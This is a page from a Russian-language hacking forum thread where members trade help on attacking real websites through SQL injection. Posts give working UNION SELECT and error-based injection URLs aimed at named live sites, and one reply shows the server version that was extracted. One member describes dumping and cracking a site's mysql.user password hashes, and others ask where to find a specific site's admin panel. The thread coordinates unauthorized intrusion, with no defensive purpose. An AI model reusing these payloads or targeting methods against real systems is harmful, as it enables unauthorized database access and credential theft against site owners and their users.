Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    сразу мен
     
  2. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    а по запросу в бразере например /detail.php?id=-99+/*!UnIoN+SeLeCt*/+1,2,3,state,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+fuck_order+limit+1,1+--+
    нормально выводит?
     
  3. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    с коментарием -- да , в софте то же он
    вернее нормально если добавить group _ concat
     
    #15203 Koren, 31 Oct 2010
    Last edited: 31 Oct 2010
  4. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Тогда хз, так не понять, вышли хотя б в личку скрин проги с твоим запросом
     
  5. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    такая ситуация. на сайте mysql-inj. но user()=am***[email protected]
    т.е. получается база на другом серве. прочитал mysql.user.
    расшифровал пароли. нашел одного юзера у кого host=%
    пытаюсь подключится к nsite1.net- выдает access denied
    в чем может быть трабла?
     
  6. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Не понял. Нормально объясни.
     
  7. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    В том, что доступ к базе данных разрешен только с этого домена.
     
  8. Malygos

    Malygos New Member

    Joined:
    9 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://www.radioreference.com/apps/audio/?ctid=92

    http://www.radioreference.com/apps/audio/?ctid=92' (opera, not firefox)
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Ip.Ip.Ip.Ip' at line 1
     
  9. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Нету тут ничего.
     
  10. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    есть уязвимый сайт:
    Code:
    www.site.com/index.php?login=<sql>&passwd='
    кол-во столбцов подобрал, но почему то не выводит в какой колонке идет вывод на страницу.

    подскажите чё нють плиз.
     
  11. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2-PRIVAT- and Malygos
    h--ps://rdot.org/forum/showthread.php?t=685
    2Tw!m4
    net vyvoda. esli errory vyvodit - poprobui cherez nih
     
  12. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Крути как блинд. Мы не экстрасенсы, линк давай!
     
  13. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    ПОдскажите плиз есть что-нибудь работающее в паблике для парсинга сайтов из гугла по определенному запросу?
     
  14. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    2 -PRIVAT-

    Code:
    http://rwo[dot]solutions[dot]co[dot]at/login.php?luser=%27union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null--%20&passwd=testik%27
    
    вот собственно сайтец

    как и говорил, с неверным кол-вом столбцов выдаёт ошибку, при правельном подборе страница показывает как ни в чём не бывало.....
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://rwo.solutions.co.at/ab/ab.php?id=954+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+%20&opt=edit
     
    _________________________
  16. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    А чё тут должно выйти? Чё т я как то не совсем врубаюсь...у меня выдает 404 еррор

    object not found

    PS: все пробелы убрал...
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    работало 2 минут назад, через дупликат

    по всей видимости скрипт убрали...

    UPD: работает

    Duplicate entry '5.0.45-community-nt1' for key 1
     
    _________________________
    #15217 Konqi, 2 Nov 2010
    Last edited: 2 Nov 2010
    1 person likes this.
  18. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.salsacrazy.com помогите админку найти
     
  19. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    http://www.salsacrazy.com/cpanel
     
    2 people like this.
  20. boxazbox

    boxazbox Banned

    Joined:
    21 Sep 2010
    Messages:
    9
    Likes Received:
    3
    Reputations:
    6
    pomoqite pojalusta dalse raskrutit sql inj..
     
Thread Status:
Not open for further replies.